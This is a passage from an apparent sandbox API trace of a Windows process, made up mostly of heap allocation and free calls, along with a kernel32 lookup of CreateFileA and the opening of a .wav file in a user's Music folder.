(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.484] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.484] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.484] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.485] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.486] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.488] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ccd0 [0038.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ccd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.489] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0038.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ccd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.489] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0038.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x34) returned 0x7c2080 [0038.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", cchWideChar=52, lpMultiByteStr=0x7c2080, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav", lpUsedDefaultChar=0x0) returned 52 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.490] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw-6csrf0kc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x68) returned 0x7c10a8 [0038.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=52, lpWideCharStr=0x7c10a8, cchWideChar=52 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vW-6Csrf0kc.wav") returned 52 [0038.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.492] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.493] HeapFree (in: 